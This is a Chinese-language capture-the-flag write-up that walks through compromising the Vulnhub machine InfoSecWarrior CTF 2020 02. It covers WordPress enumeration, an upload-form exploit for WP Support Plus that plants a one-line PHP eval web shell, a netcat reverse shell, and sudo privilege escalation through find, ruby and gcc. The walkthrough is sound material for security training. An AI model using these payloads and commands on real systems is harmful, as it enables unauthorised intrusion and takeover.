Vulnhut靶机渗透 InfoSecWarrior

  • A+
所属分类:安全文章

InfoSecWarrior CTF 2020 2

Vulnhut靶机渗透 InfoSecWarrior

总体思路

Vulnhut靶机渗透 InfoSecWarrior

需要原图的话,公众号后台回复数字:0423

信息收集

IP地址

Vulnhut靶机渗透 InfoSecWarrior

nikto

无有用信息

enum4linux

无有用信息

nmap扫描

Vulnhut靶机渗透 InfoSecWarrior

发现有80端口和3306端口。

web 浏览

首页为apache的默认页面。

Vulnhut靶机渗透 InfoSecWarrior

在此页面发了网站目录[email protected],访问该目录

Vulnhut靶机渗透 InfoSecWarrior

在blog栏目找到该网站为wordpress。

wpscan

使用wpscan对网站进行扫描,使用 -e u 枚举用户

wpscan --url 10.0.2.64/[email protected] -e u

Vulnhut靶机渗透 InfoSecWarrior

我们发现了用户wp-localt 和一个页面:http://10.0.2.64/[email protected]/index.php/wp-json/wp/v2/users/?per_page=100&page=1

访问该页面:

Vulnhut靶机渗透 InfoSecWarrior

在页面中发现:[email protected]!!,提示为可以用此密码得到shell

在使用-e ap,查看wordpress的插件

wpscan --url 10.0.2.64/[email protected] -e ap

Vulnhut靶机渗透 InfoSecWarrior

发现插件WP Support Plus Responsive Ticket System 和上传目录http://10.0.2.64/[email protected]/wp-content/uploads/

web shell

利用漏洞:WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution

Vulnhut靶机渗透 InfoSecWarrior

<form method="post" enctype="multipart/form-data" action=" 
    <input type="hidden" name="action" value="wpsp_upload_attachment">    
    Choose a file ending with .phtml:    
    <input type="file" name="0">    
    <input type="submit" value="Submit">
</form>

将代码进行适配并保存到本地,存为html文件,本地启用http服务并加载该文件。

Vulnhut靶机渗透 InfoSecWarrior

Vulnhut靶机渗透 InfoSecWarrior

可以看到,是需要上传一个.phtml的文件,我们将一句话木马写入文件

<?php @eval($_POST['cmd']);?>

Vulnhut靶机渗透 InfoSecWarrior

将木马上传。

Vulnhut靶机渗透 InfoSecWarrior

Vulnhut靶机渗透 InfoSecWarrior

在上传文件夹下的wpsp文件夹中找到了上传的木马。

Vulnhut靶机渗透 InfoSecWarrior

用蚁剑连接

Vulnhut靶机渗透 InfoSecWarrior

在蚁剑中使用虚拟终端,就获得了webshell

Vulnhut靶机渗透 InfoSecWarrior

Vulnhut靶机渗透 InfoSecWarrior

系统shell

反弹shell

在蚁剑中的虚拟终端中,使用nc反弹

Vulnhut靶机渗透 InfoSecWarrior

本地监听,得到反弹shell

Vulnhut靶机渗透 InfoSecWarrior

提权

信息收集

数据库信息

Vulnhut靶机渗透 InfoSecWarrior

'DB_NAME', 'hackNos'
'DB_USER', 'wp'
'DB_PASSWORD', '[email protected]'

系统信息

系统用户

cat /etc/passwd|grep /bin/bash

Vulnhut靶机渗透 InfoSecWarrior

hunter:x:1000:1000:hunter,,,:/home/hunter:/bin/bash
security:x:1001:1001:Security,,,,Audit:/home/security:/bin/bash
hackNos-boat:x:1002:1002:crawler,,,,web directory crawler:/home/hackNos-boat:/bin/bash

关键文件

在 /home/hunter/下发现user.txt文件。

提权到security

使用之前的[email protected]!!和数据库密码[email protected]尝试登录三个系统账号,最终发现security的密码为[email protected]!!

Vulnhut靶机渗透 InfoSecWarrior

我们已经提权到security

提权到hackNos-boat

使用sudo -l查看特权

Vulnhut靶机渗透 InfoSecWarrior

发现可以用hackNos-boast账户使用find命令,使用find进行提权 使用gtfo查找提权命令,网址为:https://gtfobins.github.io/

Vulnhut靶机渗透 InfoSecWarrior

执行命令:

sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash ; -quit

Vulnhut靶机渗透 InfoSecWarrior

已经提权到hackNos-boast账号

提权到hunter

使用sudo -l查看特权

Vulnhut靶机渗透 InfoSecWarrior

发现可以用hunter账户使用ruby命令,使用ruby进行提权 使用gtfo查找提权命令。

Vulnhut靶机渗透 InfoSecWarrior

执行命令:

sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'

Vulnhut靶机渗透 InfoSecWarrior

提权到hunter账号

user.txt文件

访问前面发现的user.txt文件

Vulnhut靶机渗透 InfoSecWarrior

得到第一个flag4676cd2e30b6d0b8650d14a5dd9f16c3

提权到root

使用sudo -l查看特权

Vulnhut靶机渗透 InfoSecWarrior

发现可以用root执行gcc命令,使用gcc提权

Vulnhut靶机渗透 InfoSecWarrior

用gtfo查找提权命令

sudo /usr/bin/gcc -wrapper /bin/bash,-s .

Vulnhut靶机渗透 InfoSecWarrior

访问root.txt

Vulnhut靶机渗透 InfoSecWarrior

bae11ce4f67af91fa58576c1da2aad4b

Vulnhut靶机渗透 InfoSecWarrior

原创投稿作者:Crazy

靶机下载地址:https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-02,447/

本文来源于互联网

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: